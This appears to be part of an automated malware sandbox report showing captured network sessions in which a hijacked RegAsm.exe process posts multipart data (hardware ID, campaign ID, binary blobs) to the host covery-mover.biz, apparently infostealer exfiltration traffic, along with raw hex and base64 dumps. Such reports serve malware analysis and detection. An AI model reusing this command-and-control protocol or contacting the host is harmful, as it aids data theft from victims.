                                                                        Data Ascii: 9OYRZ0/jqmx8p7p70tPFdZnGy0AkyXbLyxI5plc/w13Y1jhmKsqfdWiv536b6wFBmdLORLj5XvPnaxHvV0rjZcX7QWYex55gQKOGY87/3UGl0u9kVOl2+98GCZJzP/cx4N4QVy/anlAJsud/RveJURXqt2lsiF6u+y4gkw4v/23U1jhGLquKdES3rmf+3+FFqeLzVFz1etezegWKJwbiQPTmQWdP40YMNPffdy7n6WW1v/MxVJBm18ozcJJDL9N
                                                                        2024-12-12 06:52:16 UTC1369INData Raw: 47 59 61 38 36 35 63 53 4a 2b 76 66 73 50 72 7a 54 79 6f 68 2f 4f 59 57 4d 6c 6d 78 36 49 79 62 4b 6f 4b 4c 2f 39 49 39 5a 73 67 56 68 62 6a 6f 6e 78 59 6e 36 5a 37 79 74 50 4e 53 59 33 47 30 77 52 6f 35 55 62 50 77 77 34 56 67 6e 73 37 38 32 58 6b 34 68 31 6e 46 2b 4f 43 4c 57 6e 53 68 73 4e 6d 50 74 6e 5a 51 4f 61 4f 64 41 6e 31 65 76 72 36 55 78 47 69 59 78 2f 44 52 65 7a 65 45 45 34 4b 7a 36 35 67 65 49 4f 69 61 2b 4c 76 78 55 6d 74 39 73 4e 6b 64 50 6c 71 39 38 63 4f 4d 4a 4e 57 4c 2f 38 59 39 5a 73 67 38 6e 4c 50 70 6c 56 6f 7a 72 34 61 2b 76 66 67 58 4d 6a 6d 77 32 68 30 37 58 4c 37 2f 79 6f 78 68 6b 38 2f 35 32 48 73 39 68 78 32 4f 75 65 69 58 46 69 4c 72 6e 76 2b 32 2f 31 68 68 66 50 79 64 57 7a 70 42 38 71 61 4d 74 57 65 4e 33 4f 6a 53 50 53 48
                                                                        Data Ascii: GYa865cSJ+vfsPrzTyoh/OYWMlmx6IybKoKL/9I9ZsgVhbjonxYn6Z7ytPNSY3G0wRo5UbPww4Vgns782Xk4h1nF+OCLWnShsNmPtnZQOaOdAn1evr6UxGiYx/DRezeEE4Kz65geIOia+LvxUmt9sNkdPlq98cOMJNWL/8Y9Zsg8nLPplVozr4a+vfgXMjmw2h07XL7/yoxhk8/52Hs9hx2OueiXFiLrnv+2/1hhfPydWzpB8qaMtWeN3OjSPSH
                                                                        2024-12-12 06:52:16 UTC1369INData Raw: 2f 2f 54 51 6d 7a 50 6c 4f 32 74 39 31 6c 68 62 36 65 54 42 48 4e 41 38 76 6e 41 78 44 7a 62 79 50 50 56 65 54 36 45 47 59 2b 31 35 34 45 56 4b 2b 61 57 39 61 6a 2b 55 47 31 79 74 4e 67 55 4f 30 75 2b 38 4e 36 42 64 6f 6d 4c 74 70 35 36 4a 73 68 42 79 34 37 67 67 77 6f 76 6f 36 37 6f 75 65 4a 63 5a 33 58 38 7a 46 55 6b 47 62 58 79 6a 4e 77 6b 6e 63 54 78 33 58 49 2f 67 52 57 47 76 65 36 57 47 79 72 6c 6c 66 53 36 38 6c 46 72 66 4c 62 51 47 6a 64 51 74 66 62 4c 68 33 62 62 68 62 6a 5a 5a 58 37 51 57 61 4b 2f 39 5a 30 4b 62 50 37 52 35 2f 72 7a 57 79 6f 68 2f 4e 63 52 4d 6c 32 31 38 73 71 42 59 70 62 4b 39 39 39 39 4d 59 77 53 67 72 37 6d 6e 68 38 68 35 59 33 30 73 66 74 62 59 33 57 78 6b 31 56 39 58 71 71 2b 6c 4d 52 56 6c 73 58 32 32 57 74 2b 6c 31 65 53
                                                                        Data Ascii: //TQmzPlO2t91lhb6eTBHNA8vnAxDzbyPPVeT6EGY+154EVK+aW9aj+UG1ytNgUO0u+8N6BdomLtp56JshBy47ggwovo67oueJcZ3X8zFUkGbXyjNwkncTx3XI/gRWGve6WGyrllfS68lFrfLbQGjdQtfbLh3bbhbjZZX7QWaK/9Z0KbP7R5/rzWyoh/NcRMl218sqBYpbK9999MYwSgr7mnh8h5Y30sftbY3Wxk1V9Xqq+lMRVlsX22Wt+l1eS
                                                                        2024-12-12 06:52:16 UTC1369INData Raw: 6b 71 35 35 54 79 71 50 31 58 61 58 4c 38 6e 56 73 36 51 66 4b 6d 6a 4b 64 7a 6a 63 48 2f 30 6d 73 31 69 52 71 64 74 66 66 54 56 47 7a 77 6d 4f 2f 36 72 45 46 36 62 72 76 4d 56 53 51 5a 74 66 4b 4d 33 43 53 64 77 76 37 5a 65 7a 43 61 48 49 32 33 36 4a 6f 54 4b 4f 6d 63 2f 72 37 77 55 47 39 36 73 4e 67 63 50 6c 61 32 39 38 4b 4e 61 39 75 46 75 4e 6c 6c 66 74 42 5a 71 71 50 6b 6e 78 64 73 2f 74 48 6e 2b 76 4e 62 4b 69 48 38 33 78 55 34 57 62 6a 34 79 49 46 69 6b 63 37 34 31 58 34 78 6a 42 2b 50 74 2b 65 59 45 79 33 6e 6d 76 53 78 38 6c 70 70 66 37 71 54 56 58 31 65 71 72 36 55 78 45 53 41 78 76 54 5a 50 53 48 47 41 4d 75 2f 36 39 4e 43 62 4f 71 54 2b 72 33 30 57 6d 6c 78 75 64 63 52 4f 46 6d 36 37 4d 53 45 59 34 6e 5a 2b 4e 64 34 4d 6f 73 5a 6a 37 37 75 6c
                                                                        Data Ascii: kq55TyqP1XaXL8nVs6QfKmjKdzjcH/0ms1iRqdtffTVGzwmO/6rEF6brvMVSQZtfKM3CSdwv7ZezCaHI236JoTKOmc/r7wUG96sNgcPla298KNa9uFuNllftBZqqPknxds/tHn+vNbKiH83xU4Wbj4yIFikc741X4xjB+Pt+eYEy3nmvSx8lppf7qTVX1eqr6UxESAxvTZPSHGAMu/69NCbOqT+r30WmlxudcROFm67MSEY4nZ+Nd4MosZj77ul
                                                                        2024-12-12 06:52:16 UTC277INData Raw: 4f 77 50 71 73 54 6c 51 35 74 38 55 63 4c 56 71 6b 39 63 47 49 64 61 57 4c 6f 49 6f 76 62 4e 70 4c 32 61 65 6e 6a 43 56 69 6f 5a 36 2b 34 73 31 4f 4b 6d 2f 38 69 30 6c 7a 47 61 43 2b 6c 4d 51 6a 6d 4e 6e 71 32 48 34 6f 69 31 36 31 68 73 43 46 45 43 76 78 6d 4f 6d 31 74 42 6b 71 64 76 79 4c 49 6e 31 51 74 65 58 64 6b 6d 6d 4c 7a 4c 6a 68 4d 33 36 51 57 64 50 34 30 70 41 55 49 75 61 4a 37 2f 66 54 51 57 42 2b 72 4e 51 4d 4d 68 6e 38 76 73 72 45 50 4d 69 46 75 4e 70 73 66 74 42 4a 32 65 4f 79 77 45 31 38 73 34 43 77 6f 37 52 42 4b 69 48 75 6e 56 73 76 47 65 71 2b 69 34 64 32 69 63 33 37 79 48 35 35 74 69 65 73 6f 75 71 56 44 54 33 66 6f 66 6d 67 2b 56 46 39 61 50 44 47 47 44 4e 58 74 65 69 4d 79 69 53 55 69 36 44 6e 50 58 62 49 4a 73 58 34 2f 39 4e 43 62 4e
                                                                        Data Ascii: OwPqsTlQ5t8UcLVqk9cGIdaWLoIovbNpL2aenjCVioZ6+4s1OKm/8i0lzGaC+lMQjmNnq2H4oi161hsCFECvxmOm1tBkqdvyLIn1QteXdkmmLzLjhM36QWdP40pAUIuaJ7/fTQWB+rNQMMhn8vsrEPMiFuNpsftBJ2eOywE18s4Cwo7RBKiHunVsvGeq+i4d2ic37yH55tiesouqVDT3fofmg+VF9aPDGGDNXteiMyiSUi6DnPXbIJsX4/9NCbN
                                                                        2024-12-12 06:52:16 UTC1369INData Raw: 32 31 34 63 0d 0a 4c 45 59 74 75 54 71 4a 41 39 4f 70 6c 5a 30 2b 69 31 79 45 39 2f 74 73 2b 73 70 62 70 4f 4b 6d 2f 38 69 30 6c 7a 47 61 43 2b 6c 4d 51 6a 6d 4e 6e 71 32 48 34 6f 69 31 36 31 68 73 6d 55 48 43 6e 6d 6a 37 79 55 2f 30 4e 74 4f 66 4b 54 46 48 30 42 69 37 36 45 78 46 76 56 69 2b 43 65 4a 58 36 39 47 6f 57 32 34 49 55 4c 59 63 2b 59 2b 4c 2f 7a 52 79 68 58 74 38 63 63 66 52 66 79 2b 49 7a 63 4e 4e 57 4c 2f 4d 38 39 5a 74 68 4c 30 4f 32 30 78 45 70 2b 2f 74 48 6e 2b 75 49 58 4d 69 76 79 6b 77 6c 39 41 66 4b 35 7a 35 5a 32 6e 63 6a 75 33 54 6f 41 74 68 71 64 74 65 69 59 47 78 4c 66 73 66 4f 37 39 31 6b 6f 53 4b 72 65 43 7a 35 63 74 63 44 79 69 6d 4f 50 7a 50 62 59 66 58 37 47 57 59 54 34 76 36 70 61 5a 4b 47 67 73 50 72 73 46 7a 49 35 69 64 41
                                                                        Data Ascii: 214cLEYtuTqJA9OplZ0+i1yE9/ts+spbpOKm/8i0lzGaC+lMQjmNnq2H4oi161hsmUHCnmj7yU/0NtOfKTFH0Bi76ExFvVi+CeJX69GoW24IULYc+Y+L/zRyhXt8ccfRfy+IzcNNWL/M89ZthL0O20xEp+/tHn+uIXMivykwl9AfK5z5Z2ncju3ToAthqdteiYGxLfsfO791koSKreCz5ctcDyimOPzPbYfX7GWYT4v6paZKGgsPrsFzI5idA
                                                                        2024-12-12 06:52:16 UTC1369INData Raw: 4f 65 4d 6b 69 54 44 6d 62 61 65 62 33 37 51 57 63 79 37 39 59 45 63 4c 2f 65 63 75 59 54 4b 63 47 52 2b 76 63 55 4c 4d 46 57 54 2f 64 32 4f 57 71 58 65 2b 39 42 7a 4f 5a 34 49 79 2f 61 6e 6e 46 70 30 32 4e 2b 32 2b 73 73 5a 4b 6d 48 38 69 31 73 49 57 72 7a 77 79 35 4a 31 31 75 7a 32 32 58 77 6f 6d 42 53 48 6d 65 53 43 45 47 79 76 33 2f 6a 36 72 41 55 6b 4f 62 6a 43 57 32 55 4a 34 4b 57 5a 31 7a 50 4c 6d 65 65 51 5a 48 36 65 57 64 50 71 71 64 4d 49 62 4c 6e 66 75 62 6e 6d 52 57 78 36 71 74 42 63 41 32 65 58 36 63 2b 55 59 70 6a 31 78 76 56 78 4f 49 38 44 6a 4c 37 42 73 31 70 69 6f 5a 43 2b 34 73 30 58 49 6a 6d 44 6e 56 73 6c 47 65 71 2b 2b 59 64 71 6c 63 7a 75 7a 7a 41 62 6e 78 71 62 76 75 54 54 56 47 7a 6e 33 36 62 71 75 68 64 75 61 50 79 4c 53 32 38 43
                                                                        Data Ascii: OeMkiTDmbaeb37QWcy79YEcL/ecuYTKcGR+vcULMFWT/d2OWqXe+9BzOZ4Iy/annFp02N+2+ssZKmH8i1sIWrzwy5J11uz22XwomBSHmeSCEGyv3/j6rAUkObjCW2UJ4KWZ1zPLmeeQZH6eWdPqqdMIbLnfubnmRWx6qtBcA2eX6c+UYpj1xvVxOI8DjL7Bs1pioZC+4s0XIjmDnVslGeq++YdqlczuzzAbnxqbvuTTVGzn36bquhduaPyLS28C


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449739172.67.206.644437184C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 06:52:18 UTC283OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=YPG1TIB3SUIY02Y203Y
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 18169
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:18 UTC15331OUTData Raw: 2d 2d 59 50 47 31 54 49 42 33 53 55 49 59 30 32 59 32 30 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 59 50 47 31 54 49 42 33 53 55 49 59 30 32 59 32 30 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 50 47 31 54 49 42 33 53 55 49 59 30 32 59 32 30 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 6f 74
                                                                        Data Ascii: --YPG1TIB3SUIY02Y203YContent-Disposition: form-data; name="hwid"2AA6A2C71324A32B23D904AF30EFEBBC--YPG1TIB3SUIY02Y203YContent-Disposition: form-data; name="pid"2--YPG1TIB3SUIY02Y203YContent-Disposition: form-data; name="lid"DUkgLv--ot
                                                                        2024-12-12 06:52:18 UTC2838OUTData Raw: 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62
                                                                        Data Ascii: ,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pyb
                                                                        2024-12-12 06:52:19 UTC1013INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=6srn1qaef6b2gl6ffbckgh90ar; expires=Mon, 07-Apr-2025 00:38:57 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jbw%2B%2FgApoWw5XdoJWFHY2yaSo6puc6IpcN9BYYoPGUFseSzMIRP5VJMQEfvg6gCHRyzKW1XXIoZs%2B4OZVFoyITkngDzIPyeNdlfWuLJYEVI9GoukhZVuX0bUtdfkdWBgIHKJ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bca76ef8e0f77-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1677&rtt_var=652&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19132&delivery_rate=1648785&cwnd=231&unsent_bytes=0&cid=1ef70a5d3bc0c60d&ts=862&x=0"
                                                                        2024-12-12 06:52:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                        Data Ascii: fok 8.46.123.175
                                                                        2024-12-12 06:52:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.449740172.67.206.644437184C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 06:52:20 UTC277OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=G2LZBTFA26935Y
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8760
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:20 UTC8760OUTData Raw: 2d 2d 47 32 4c 5a 42 54 46 41 32 36 39 33 35 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 47 32 4c 5a 42 54 46 41 32 36 39 33 35 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 32 4c 5a 42 54 46 41 32 36 39 33 35 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 6f 74 64 65 6c 0d 0a 2d 2d 47 32 4c 5a 42 54 46 41
                                                                        Data Ascii: --G2LZBTFA26935YContent-Disposition: form-data; name="hwid"2AA6A2C71324A32B23D904AF30EFEBBC--G2LZBTFA26935YContent-Disposition: form-data; name="pid"2--G2LZBTFA26935YContent-Disposition: form-data; name="lid"DUkgLv--otdel--G2LZBTFA
                                                                        2024-12-12 06:52:21 UTC1014INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=nk5c2pi9p773p2596d1i1fsqf2; expires=Mon, 07-Apr-2025 00:38:59 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mcS9MVby2uIWvRllmfoqBj6GSBBC%2B%2FOSR2BQHbT2tY%2BIj4HFdLUGaLLDZx%2B3gnX31yg4PcUo53d2R4DnDhk74iTfVjL0LITL1lJBHfMHLNUUqUCh46edUUXKaFRvuF277BQa"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bca84cc798c69-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1763&rtt_var=673&sent=11&recv=14&lost=0&retrans=0&sent_bytes=2841&recv_bytes=9695&delivery_rate=1611479&cwnd=217&unsent_bytes=0&cid=5347841f4740a6f9&ts=773&x=0"
                                                                        2024-12-12 06:52:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                        Data Ascii: fok 8.46.123.175
                                                                        2024-12-12 06:52:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.449742172.67.206.644437184C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 06:52:22 UTC283OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=Z4TTJ1VUF4OCQR1DRE5
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 20443
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:22 UTC15331OUTData Raw: 2d 2d 5a 34 54 54 4a 31 56 55 46 34 4f 43 51 52 31 44 52 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 5a 34 54 54 4a 31 56 55 46 34 4f 43 51 52 31 44 52 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 5a 34 54 54 4a 31 56 55 46 34 4f 43 51 52 31 44 52 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 6f 74
                                                                        Data Ascii: --Z4TTJ1VUF4OCQR1DRE5Content-Disposition: form-data; name="hwid"2AA6A2C71324A32B23D904AF30EFEBBC--Z4TTJ1VUF4OCQR1DRE5Content-Disposition: form-data; name="pid"3--Z4TTJ1VUF4OCQR1DRE5Content-Disposition: form-data; name="lid"DUkgLv--ot
                                                                        2024-12-12 06:52:22 UTC5112OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60
                                                                        Data Ascii: `M?lrQMn 64F6(X&7~`
                                                                        2024-12-12 06:52:23 UTC1016INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=895bd9maeuomhdhm1no7jgfskl; expires=Mon, 07-Apr-2025 00:39:02 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bo0vCoyCpIiNP3fQxsy89qoqA6RM%2B7zK064ZcJAc871rL%2FOab9PU1LnCBEqAYphzOx9u5jNshe%2FirtFqv37RllFvQwDyMbGhOTdQto7fAqPJTB9wydHcAHQZM%2BR7LIeaRvIG"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bca912d1343e3-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1728&rtt_var=665&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21406&delivery_rate=1689814&cwnd=229&unsent_bytes=0&cid=763827ac7847e406&ts=1409&x=0"
                                                                        2024-12-12 06:52:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                        Data Ascii: fok 8.46.123.175
                                                                        2024-12-12 06:52:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.449746172.67.206.644437184C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 06:52:25 UTC275OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=442XREIEZD5L
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 1233
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:25 UTC1233OUTData Raw: 2d 2d 34 34 32 58 52 45 49 45 5a 44 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 34 34 32 58 52 45 49 45 5a 44 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 34 32 58 52 45 49 45 5a 44 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 6f 74 64 65 6c 0d 0a 2d 2d 34 34 32 58 52 45 49 45 5a 44 35 4c 0d 0a
                                                                        Data Ascii: --442XREIEZD5LContent-Disposition: form-data; name="hwid"2AA6A2C71324A32B23D904AF30EFEBBC--442XREIEZD5LContent-Disposition: form-data; name="pid"1--442XREIEZD5LContent-Disposition: form-data; name="lid"DUkgLv--otdel--442XREIEZD5L
                                                                        2024-12-12 06:52:26 UTC1020INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=dvfdf2j59p04i2qnn05jn9un1q; expires=Mon, 07-Apr-2025 00:39:05 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BDRv88opEcsA5Lami2v8j0EuAnkwxlw5KRuH9DsMOA66OzeHWrwutM3VE2v3xp%2FuN82lcxPHvDmn%2FSAtoC5XPWehSAs%2B9U%2BWzScQibUognjDo%2BLlK%2Bz3mJn%2BRgVTdWW4YvN8"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bcaa54ac118b4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1641&rtt_var=618&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2144&delivery_rate=1766485&cwnd=196&unsent_bytes=0&cid=109b7109294a5f93&ts=729&x=0"
                                                                        2024-12-12 06:52:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                        Data Ascii: fok 8.46.123.175
                                                                        2024-12-12 06:52:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
